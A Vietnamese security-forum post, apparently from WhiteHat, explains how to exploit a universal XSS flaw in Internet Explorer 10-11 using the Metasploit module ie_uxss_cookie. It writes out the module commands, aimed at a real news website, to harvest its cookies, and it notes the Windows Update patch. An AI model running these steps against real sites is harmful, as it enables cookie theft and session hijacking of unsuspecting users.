Hướng dẫn khai thác lỗ hổng UXSS trong trình duyệt IE10-11 với Metasploit

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Hướng dẫn khai thác lỗ hổng UXSS trong trình duyệt IE10-11 với Metasploit
Tuần qua, nhà nghiên cứu bảo mật người Mỹ là David Leo đã tìm ra phương pháp để vượt qua cơ chế Same Origin Policy (SOP) trong trình duyệt IE 10-11 để kích hoạt lỗi XSS. Các bạn có thể xem thêm tại
Để đơn giản hóa việc khai thác, các nhà phát triển Metasploit đã nhanh chóng tích hợp lỗi này vào trong Metasploit Framework. Để đảm bảo việc có cơ sở dữ liệu khai thác lỗi này, bạn cần cập nhật cơ sở dữ liệu trong Metasploit mới nhất.

Cách khai thác:

Ở đây đã được test trên phiên bản Windows 8.1 Pro vơi trình duyệt IE 11 ( khai thác cũng hoạt động với IE 10)

Mở Metasploit và sử dụng module:

  • use auxiliary/gather/ie_uxss_cookie
  • set TARGET_URI [URL]http://www.freiepresse.de/artikel_archiv.php
  • run
Mở IE và đi tới đường dẫn mà khai thác tạo ra.

Nếu đầu tiên bạn không thấy bất kỳ một cookie nào từ freiepress. Bạn chỉ cần thử lại khai thác, và bạn sẽ nhận được cookie như hình dưới đây:

a20d56c0-ad37-11e4-8a7f-8b9a13e8782f.png


Nếu bạn dùng tùy chọn CUSTOMJS (trong trường hợp này, mình đã dùng

ae27d412-ad37-11e4-9b3e-e75f499dd984.png


Ps: Lỗi UXSS này rất nguy hiểm vì nó không cần tới sự tương tác của người dùng để kích hoạt khai thác. Để vá lỗi cho IE bạn cần cập nhật các bản vá trong Windows thông qua Windows Update.

Chúc tất cả anh em trong diễn đàn có những ngày đầu xuân năm mới tràn đầy niềm vui, thành công, và luôn an toàn trên Internet! :D
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bên trên